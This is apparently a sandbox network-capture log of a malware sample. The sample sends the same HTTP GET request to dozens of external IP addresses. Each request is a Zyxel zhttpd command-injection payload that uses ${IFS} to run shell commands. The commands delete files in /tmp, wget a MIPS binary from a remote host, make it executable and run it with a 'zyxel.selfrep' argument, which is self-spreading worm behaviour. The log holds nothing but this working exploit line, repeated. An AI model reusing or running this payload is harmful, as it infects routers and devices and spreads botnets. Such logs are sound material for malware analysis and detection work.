                                          Jan 14, 2024 15:46:15.980544090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4138192.168.2.2337232186.176.162.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980587006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4139192.168.2.2343660110.7.155.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980633974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4140192.168.2.2358262192.38.217.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980664968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4141192.168.2.234153853.173.54.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980700016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4142192.168.2.234712292.243.143.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980711937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4143192.168.2.234251046.28.246.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980730057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4144192.168.2.23536721.216.201.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980767012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4145192.168.2.2345124134.115.137.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980793953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4146192.168.2.2340602124.158.56.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980832100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4147192.168.2.2345490184.202.22.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980844021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4148192.168.2.235729478.206.11.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980895042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4149192.168.2.2333608188.158.191.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980895042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4150192.168.2.2348348117.163.30.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980937958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4151192.168.2.2360908169.215.245.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980964899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4152192.168.2.234601824.249.13.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980988026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4153192.168.2.234946613.16.78.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980998993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4154192.168.2.233605892.179.99.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981055975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4155192.168.2.235411875.35.172.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981061935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4156192.168.2.235160241.164.188.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981100082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4157192.168.2.234598834.207.208.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981122971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4158192.168.2.2350634123.123.164.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981136084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4159192.168.2.233705291.118.162.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981158972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4160192.168.2.233625639.127.64.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981178999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4161192.168.2.2352716150.85.28.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981215954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4162192.168.2.235535470.74.254.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981257915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4163192.168.2.235861835.204.23.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981281042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4164192.168.2.233382298.72.53.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981281042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4165192.168.2.2350348114.208.157.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981323004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4166192.168.2.2353868220.40.202.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981363058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4167192.168.2.234971677.24.51.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981374979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4168192.168.2.2339800131.76.127.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981399059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4169192.168.2.234708817.185.97.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981425047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4170192.168.2.2338322156.101.35.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981429100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4171192.168.2.2343236188.89.63.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981466055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4172192.168.2.235087675.91.134.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981518984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4173192.168.2.235445840.201.134.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981525898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4174192.168.2.233791031.136.192.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981537104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4175192.168.2.233598823.87.122.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981563091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4176192.168.2.233528286.159.10.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981617928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4177192.168.2.2359218202.190.178.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981646061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4178192.168.2.2342586204.189.5.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981648922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4179192.168.2.2354460139.36.184.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981648922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4180192.168.2.233904699.65.203.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981689930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4181192.168.2.2345376174.229.129.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981703043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4182192.168.2.2341422150.11.66.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981729984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4183192.168.2.2340870160.81.213.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981740952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4184192.168.2.2350764168.134.232.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981741905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4185192.168.2.2334234204.134.27.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981782913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4186192.168.2.2345414182.42.171.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981782913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4187192.168.2.2356452193.181.7.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981787920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4188192.168.2.235111453.209.136.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981832027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4189192.168.2.234217685.39.137.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981844902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4190192.168.2.23607282.110.37.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981863976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4191192.168.2.23422285.97.221.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981928110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4192192.168.2.2351860209.19.212.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981969118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4193192.168.2.235247677.1.153.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.981998920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4194192.168.2.2340610189.13.61.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982006073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4195192.168.2.2351870175.219.239.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982029915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4196192.168.2.234815219.167.27.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982049942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4197192.168.2.2335376160.143.22.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982083082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4198192.168.2.234470698.214.109.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982125998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4199192.168.2.2360722188.22.13.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982151985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4200192.168.2.2350126197.197.218.27443
                                          TimestampBytes transferredDirectionData
